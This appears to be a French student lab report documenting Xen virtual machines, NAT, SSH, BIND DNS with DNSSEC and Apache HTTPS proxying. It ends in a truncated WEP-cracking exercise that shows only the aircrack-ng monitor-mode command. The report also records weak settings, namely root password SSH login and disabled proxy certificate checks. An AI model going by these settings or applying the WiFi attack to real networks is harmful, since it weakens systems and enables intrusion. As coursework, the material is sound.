&amp;lt;/div&amp;gt;&amp;lt;span id=&amp;quot;introduction&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
= Introduction =&lt;br /&gt;
&lt;br /&gt;
Ce rapport documente la réalisation complète du projet de sécurité système et réseau dans le cadre du module SE4 IdO (Internet des Objets). L’objectif principal était de mettre en place une infrastructure réseau complète avec services virtualisés, en mettant l’accent sur la sécurité et la redondance.&lt;br /&gt;
&lt;br /&gt;
L’architecture repose sur une approche '''dual-stack IPv4/IPv6''' avec :&lt;br /&gt;
&lt;br /&gt;
* Une '''machine de services''' (SE4.Moon) hébergeant les services applicatifs&lt;br /&gt;
* Une '''machine mandataire''' (SE4.Solstice) gérant les accès IPv4 via NAT et proxy inverse&lt;br /&gt;
* Une infrastructure réseau redondante avec routeurs Cisco C9200&lt;br /&gt;
* Des services sécurisés (DNS avec DNSSEC, HTTPS avec certificats, SSH avec filtrage)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;atelier-système-et-réseau---machines-virtuelles&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
= Atelier système et réseau - Machines virtuelles =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;création-des-machines-virtuelles&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Création des machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
Les machines virtuelles ont été créées sur l’hyperviseur Xen du Dom0 &amp;lt;code&amp;gt;capbreton.plil.info&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;commandes-de-création&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Commandes de création ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Création de la machine de services SE4.Moon&lt;br /&gt;
root@capbreton:~# xen-create-image --hostname=SE4.Moon --dhcp \&lt;br /&gt;
  --bridge=pontKS --dir=/usr/local/xen --size=10GB \&lt;br /&gt;
  --dist=daedalus --memory=2048M --force&lt;br /&gt;
&lt;br /&gt;
# Création de la machine mandataire SE4.Solstice&lt;br /&gt;
root@capbreton:~# xen-create-image --hostname=SE4.Solstice --dhcp \&lt;br /&gt;
  --bridge=pontKS --dir=/usr/local/xen --size=10GB \&lt;br /&gt;
  --dist=daedalus --memory=2048M --force&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;démarrage-et-connexion&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Démarrage et connexion ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Démarrage des VMs&lt;br /&gt;
xen create /etc/xen/SE4.Moon.cfg&lt;br /&gt;
xen create /etc/xen/SE4.Solstice.cfg&lt;br /&gt;
&lt;br /&gt;
# Connexion aux consoles&lt;br /&gt;
xen console SE4.Moon&lt;br /&gt;
xen console SE4.Solstice&lt;br /&gt;
&lt;br /&gt;
# Liste des VMs actives&lt;br /&gt;
root@capbreton:~# xen list&lt;br /&gt;
Name                                        ID   Mem VCPUs    State   Time(s)&lt;br /&gt;
SE4.Solstice                                39  2048     1     -b----    2560.1&lt;br /&gt;
SE4.Moon                                   119  2048     1     -b----     452.3&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-de-la-machine-de-services-se4.moon&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Configuration de la machine de services (SE4.Moon) ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;montage-des-partitions-lvm-pour-var-et-home&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Montage des partitions LVM pour /var et /home ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Création des fichiers de partition sur le Dom0&lt;br /&gt;
root@capbreton:/dev/virtual# lvcreate -L 10G -n SE4.Moon.var virtual&lt;br /&gt;
root@capbreton:/dev/virtual# lvcreate -L 10G -n SE4.Moon.home virtual&lt;br /&gt;
&lt;br /&gt;
# Modification du fichier de configuration Xen&lt;br /&gt;
disk = [&lt;br /&gt;
    'file:/usr/local/xen/domains/SE4.Moon/disk.img,xvda2,w',&lt;br /&gt;
    'file:/usr/local/xen/domains/SE4.Moon/swap.img,xvda1,w',&lt;br /&gt;
    'phy:/dev/virtual/SE4.Moon.home,xvdb,w',&lt;br /&gt;
    'phy:/dev/virtual/SE4.Moon.var,xvdc,w',&lt;br /&gt;
]&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;formatage-et-montage-des-partitions&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Formatage et montage des partitions ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Formatage des partitions&lt;br /&gt;
mkfs -t ext4 /dev/xvdb&lt;br /&gt;
mkfs -t ext4 /dev/xvdc&lt;br /&gt;
&lt;br /&gt;
# Montage temporaire et copie des données&lt;br /&gt;
mount /dev/xvdc /mnt&lt;br /&gt;
mv /var/* /mnt/&lt;br /&gt;
umount /mnt&lt;br /&gt;
&lt;br /&gt;
mount /dev/xvdb /mnt&lt;br /&gt;
mv /home/* /mnt/&lt;br /&gt;
umount /mnt&lt;br /&gt;
&lt;br /&gt;
# Configuration du fstab&lt;br /&gt;
cat &amp;gt; /etc/fstab &amp;lt;&amp;lt; EOF&lt;br /&gt;
/dev/xvda1 none swap sw 0 0&lt;br /&gt;
/dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
/dev/xvdb /home ext4 defaults 0 2&lt;br /&gt;
/dev/xvdc /var ext4 defaults 0 2&lt;br /&gt;
EOF&lt;br /&gt;
&lt;br /&gt;
# Application des modifications&lt;br /&gt;
mount -a&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-réseau&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration réseau ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/network/interfaces&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Interface réseau privée (vers Solstice)&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.20.2/24&lt;br /&gt;
    gateway 192.168.20.1&lt;br /&gt;
&lt;br /&gt;
# Configuration IPv6 automatique&lt;br /&gt;
iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
# Vérification&lt;br /&gt;
root@Moon:~# ip a show eth0&lt;br /&gt;
2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP&lt;br /&gt;
    inet 192.168.20.2/24 brd 192.168.20.255 scope global eth0&lt;br /&gt;
    inet6 2001:660:4401:60a0:216:3eff:fe6f:f547/64 scope global dynamic&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;installation-des-paquets-de-base&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Installation des paquets de base ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;apt update &amp;amp;&amp;amp; apt upgrade -y&lt;br /&gt;
apt install -y ssh apache2 bind9 bind9utils \&lt;br /&gt;
  fail2ban openssl iptables-persistent \&lt;br /&gt;
  net-tools curl wget vim&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-de-la-machine-mandataire-se4.solstice&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Configuration de la machine mandataire (SE4.Solstice) ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-réseau-1&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration réseau ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/network/interfaces&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Interface publique (réseau routé)&lt;br /&gt;
auto eth1&lt;br /&gt;
iface eth1 inet static&lt;br /&gt;
    address 193.48.57.167/27&lt;br /&gt;
    gateway 193.48.57.162  # Adresse VRRP virtuelle&lt;br /&gt;
&lt;br /&gt;
iface eth1 inet6 auto&lt;br /&gt;
&lt;br /&gt;
# Interface privée (vers Moon)&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.20.1/24&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
# Vérification&lt;br /&gt;
root@Solstice:~# ip a show eth1&lt;br /&gt;
3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP&lt;br /&gt;
    inet 193.48.57.167/27 brd 193.48.57.191 scope global eth1&lt;br /&gt;
    inet6 2001:660:4401:60a0:216:3eff:fe29:880f/64 scope global dynamic&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;mise-en-place-de-la-mascarade-nat&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Mise en place de la mascarade (NAT) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Activation du forwarding IP&lt;br /&gt;
echo &amp;quot;net.ipv4.ip_forward=1&amp;quot; &amp;gt;&amp;gt; /etc/sysctl.conf&lt;br /&gt;
sysctl -p&lt;br /&gt;
&lt;br /&gt;
# Règles iptables pour la mascarade&lt;br /&gt;
iptables -t nat -A POSTROUTING -s 192.168.20.0/24 -o eth1 -j MASQUERADE&lt;br /&gt;
iptables -A FORWARD -i eth0 -o eth1 -j ACCEPT&lt;br /&gt;
iptables -A FORWARD -i eth1 -o eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT&lt;br /&gt;
&lt;br /&gt;
# Sauvegarde pour persistance&lt;br /&gt;
iptables-save &amp;gt; /etc/iptables/rules.v4&lt;br /&gt;
&lt;br /&gt;
# Ajout dans interfaces pour chargement au démarrage&lt;br /&gt;
post-up iptables-restore &amp;lt; /etc/iptables/rules.v4&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;services-internet&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
= Services Internet =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;serveur-ssh&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Serveur SSH ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-ssh-sur-moon&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration SSH sur Moon ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Édition du fichier de configuration&lt;br /&gt;
vim /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
# Modifications apportées :&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
PasswordAuthentication yes&lt;br /&gt;
Port 22&lt;br /&gt;
# LogLevel VERBOSE&lt;br /&gt;
&lt;br /&gt;
# Redémarrage du service&lt;br /&gt;
systemctl restart ssh&lt;br /&gt;
systemctl enable ssh&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;redirection-de-ports-pour-laccès-ipv4&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Redirection de ports pour l’accès IPv4 ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Redirection du port 2201 vers Moon (SSH)&lt;br /&gt;
iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 2201 \&lt;br /&gt;
  -j DNAT --to-destination 192.168.20.2:22&lt;br /&gt;
&lt;br /&gt;
iptables -A FORWARD -p tcp -d 192.168.20.2 --dport 22 -j ACCEPT&lt;br /&gt;
&lt;br /&gt;
# Sauvegarde&lt;br /&gt;
iptables-save &amp;gt; /etc/iptables/rules.v4&lt;br /&gt;
&lt;br /&gt;
# Test de la redirection&lt;br /&gt;
ssh -p 2201 root@193.48.57.167  # Arrive sur Moon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;serveur-dns&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-du-serveur-maître-moon&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration du serveur maître (Moon) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;msalhi.online&amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;quot;/etc/bind/zones/db.msalhi.online&amp;quot;;&lt;br /&gt;
    key-directory &amp;quot;/etc/bind/keys&amp;quot;;&lt;br /&gt;
    dnssec-policy &amp;quot;default&amp;quot;;&lt;br /&gt;
    inline-signing yes;&lt;br /&gt;
    allow-transfer { &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe29:880f;&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe47:bbe7;&lt;br /&gt;
	2001:660:4401:60a0:216:3eff:fed6:4bc3;&lt;br /&gt;
    };&lt;br /&gt;
    also-notify { &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe29:880f;&lt;br /&gt;
	2001:660:4401:60a0:216:3eff:fed6:4bc3;&lt;br /&gt;
    };&lt;br /&gt;
    notify yes;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Fichier de zone /etc/bind/zones/db.msalhi.online&lt;br /&gt;
$TTL 86400&lt;br /&gt;
@   IN  SOA ns1.msalhi.online. admin.msalhi.online. (&lt;br /&gt;
        2026020320  ; Serial INCRÉMENTÉ et corrigé&lt;br /&gt;
        3600        ; Refresh&lt;br /&gt;
        1800        ; Retry&lt;br /&gt;
        604800      ; Expire&lt;br /&gt;
        86400       ; Minimum TTL&lt;br /&gt;
    )&lt;br /&gt;
&lt;br /&gt;
; Serveurs de noms&lt;br /&gt;
@       IN  NS  ns1.msalhi.online.&lt;br /&gt;
@       IN  NS  ns1.merteuil.tech.&lt;br /&gt;
&lt;br /&gt;
; Enregistrements&lt;br /&gt;
@       IN  A       193.48.57.167&lt;br /&gt;
@       IN  AAAA    2001:660:4401:60a0:216:3eff:fe6f:f548&lt;br /&gt;
ns1     IN  A       193.48.57.167&lt;br /&gt;
ns1     IN  AAAA    2001:660:4401:60a0:216:3eff:fe6f:f548&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
www     IN  CNAME   msalhi.online.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
# Vérification&lt;br /&gt;
named-checkzone msalhi.online /etc/bind/zones/db.msalhi.online&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-du-serveur-secondaire-solstice&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration du serveur secondaire (Solstice) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;msalhi.online&amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;quot;/etc/bind/zones/db.msalhi.online&amp;quot;;&lt;br /&gt;
    key-directory &amp;quot;/etc/bind/keys&amp;quot;;&lt;br /&gt;
    dnssec-policy &amp;quot;default&amp;quot;;&lt;br /&gt;
    inline-signing yes;&lt;br /&gt;
    allow-transfer { &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe29:880f;&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe47:bbe7;&lt;br /&gt;
	2001:660:4401:60a0:216:3eff:fed6:4bc3;&lt;br /&gt;
    };&lt;br /&gt;
    also-notify { &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe29:880f;&lt;br /&gt;
	2001:660:4401:60a0:216:3eff:fed6:4bc3;&lt;br /&gt;
    };&lt;br /&gt;
    notify yes;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Redémarrage et vérification&lt;br /&gt;
systemctl restart bind9&lt;br /&gt;
ls -la /var/lib/bind/db.msalhi.online&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-chez-le-registrar-gandi&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration chez le registrar Gandi ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+ Configuration DNS chez Gandi&lt;br /&gt;
|-&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Type'''&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Valeur'''&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Description'''&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Nameservers&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns1.msalhi.online&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Serveur DNS primaire&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;|&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns1.merteuil.tech&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Serveur DNS secondaire&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Glue Record 1&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns1.msalhi.online&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| IPv6: 2001:660:4401:60a0:216:3eff:fe47:bbe7&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Glue Record 2&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns2.msalhi.online&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| IPv4: 193.48.57.167&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;sécurisation-de-site-web-par-certificat&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Sécurisation de site Web par certificat ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;génération-du-csr-et-obtention-du-certificat&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Génération du CSR et obtention du certificat ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Génération de la clé privée&lt;br /&gt;
openssl genrsa -out /etc/ssl/private/myserver.key 2048&lt;br /&gt;
&lt;br /&gt;
# Génération du CSR&lt;br /&gt;
openssl req -new -key /etc/ssl/private/myserver.key \&lt;br /&gt;
  -out /etc/ssl/private/server.csr&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-apache-sur-moon-https-direct-ipv6&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration Apache sur Moon (HTTPS direct IPv6) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/apache2/sites-available/msalhi-ssl.conf&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    ServerAlias www.msalhi.online&lt;br /&gt;
    Redirect permanent / https://msalhi.online/&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    ServerAlias www.msalhi.online&lt;br /&gt;
    &lt;br /&gt;
    DocumentRoot /var/www/html&lt;br /&gt;
    &lt;br /&gt;
    SSLEngine on&lt;br /&gt;
    SSLCertificateFile /etc/ssl/msalhi/msalhi.online.crt&lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/msalhi/msalhi.online.key&lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/msalhi/GandiStandardSSLCA2.pem&lt;br /&gt;
    &lt;br /&gt;
    Header always set Strict-Transport-Security &amp;quot;max-age=63072000; includeSubDomains&amp;quot;&lt;br /&gt;
    Header always set X-Frame-Options DENY&lt;br /&gt;
    Header always set X-Content-Type-Options nosniff&lt;br /&gt;
    &lt;br /&gt;
    ErrorLog ${APACHE_LOG_DIR}/msalhi_ssl_error.log&lt;br /&gt;
    CustomLog ${APACHE_LOG_DIR}/msalhi_ssl_access.log combined&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
# Activation&lt;br /&gt;
a2enmod ssl&lt;br /&gt;
a2ensite msalhi-ssl.conf&lt;br /&gt;
systemctl restart apache2&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-du-proxy-inverse-sur-solstice-https-ipv4&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration du proxy inverse sur Solstice (HTTPS IPv4) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/apache2/sites-available/msalhi-proxy.conf&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    Redirect permanent / https://msalhi.online/&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    &lt;br /&gt;
    SSLEngine on&lt;br /&gt;
    SSLCertificateFile /etc/ssl/msalhi/msalhi.online.crt&lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/msalhi/msalhi.online.key&lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/msalhi/GandiStandardSSLCA2.pem&lt;br /&gt;
    &lt;br /&gt;
    SSLProxyEngine on&lt;br /&gt;
    ProxyPreserveHost On&lt;br /&gt;
    &lt;br /&gt;
    # Utilisation de l'URL avec nom de domaine comme demandé&lt;br /&gt;
    ProxyPass / https://msalhi.online/&lt;br /&gt;
    ProxyPassReverse / https://msalhi.online/&lt;br /&gt;
    &lt;br /&gt;
    SSLProxyVerify none&lt;br /&gt;
    SSLProxyCheckPeerCN off&lt;br /&gt;
    &lt;br /&gt;
    ErrorLog ${APACHE_LOG_DIR}/proxy_error.log&lt;br /&gt;
    CustomLog ${APACHE_LOG_DIR}/proxy_access.log combined&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
# Activation des modules&lt;br /&gt;
a2enmod proxy proxy_http ssl&lt;br /&gt;
a2ensite msalhi-proxy.conf&lt;br /&gt;
systemctl restart apache2&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;sécurisation-de-serveur-dns-par-dnssec&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Sécurisation de serveur DNS par DNSSEC ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-dnssec-automatique&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration DNSSEC automatique ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Création du répertoire pour les clés&lt;br /&gt;
mkdir -p /etc/bind/keys&lt;br /&gt;
chown bind:bind /etc/bind/keys&lt;br /&gt;
&lt;br /&gt;
# Ajout dans named.conf.local&lt;br /&gt;
zone &amp;quot;msalhi.online&amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;quot;/etc/bind/zones/db.msalhi.online&amp;quot;;&lt;br /&gt;
    key-directory &amp;quot;/etc/bind/keys&amp;quot;;&lt;br /&gt;
    dnssec-policy &amp;quot;dnspol&amp;quot;;&lt;br /&gt;
    inline-signing yes;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Politique DNSSEC dans named.conf.options&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot; {&lt;br /&gt;
    keys {&lt;br /&gt;
        ksk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
        zsk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
    };&lt;br /&gt;
    nsec3param;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Redémarrage et vérification&lt;br /&gt;
systemctl restart bind9&lt;br /&gt;
dig @localhost msalhi.online DNSKEY +dnssec&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;résultat-des-clés-dnssec-générées&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Résultat des clés DNSSEC générées ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;; Clés obtenues via : dig @localhost msalhi.online DNSKEY +dnssec&lt;br /&gt;
&lt;br /&gt;
msalhi.online.        3600    IN  DNSKEY  256 3 13 Mi9LJ2JnnUciYfGEXoDuZ0ElzOigo+Fjxhf2I1+zxZqcn7SN1FxxGfFJ v4xNsU/YTvGgzf7ZWgWa29b+OQOSug==&lt;br /&gt;
msalhi.online.        3600    IN  DNSKEY  257 3 13 QrPmyYhhAVx1TGYLWRtAx/LbhQPy3yMd5/GoMH5SZ4aWD72QGVrfBOhh HW0/c1dYroeZ9riJTyQcO859svIWRw==&lt;br /&gt;
msalhi.online.        3600    IN  DNSKEY  257 3 13 Z4LE6oWmFPOb+QzklArdW7HWkH6kVrjIgrKYrJBMW3n6sMwwEG1YruHe SvmXJ9GwuFxhqtRu130iPse3wrJqyQ==&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;enregistrement-de-la-ksk-chez-gandi&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Enregistrement de la KSK chez Gandi ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+ Configuration DNSSEC chez Gandi&lt;br /&gt;
|-&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Paramètre'''&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Valeur'''&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Algorithm&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| 13 (ECDSAP256SHA256)&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Flags&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| 257 (KSK)&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Public Key&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| QrPmyYhhAVx1TGYLWRtAx/LbhQPy3yMd5/GoMH5SZ4aWD72QGVrfBOhhHW0/c1dYroeZ9riJTyQcO859svIWRw==&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Effraction WiFi =&lt;br /&gt;
&lt;br /&gt;
== Cassage de clef WEP d’un point d’accès WiFi ==&lt;br /&gt;
Le réseau cible était &amp;lt;code&amp;gt;cracotte01&amp;lt;/code&amp;gt; (BSSID &amp;lt;code&amp;gt;04:DA:D2:9C:50:50&amp;lt;/code&amp;gt;, canal 4). La procédure a été réalisée depuis la machine &amp;lt;code&amp;gt;zabeth13&amp;lt;/code&amp;gt; avec les outils &amp;lt;code&amp;gt;aircrack-ng&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;ol&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Passage de la carte en mode monitor :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo airmon-ng start wlan0&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Capture ciblée :&lt;br /&gt;
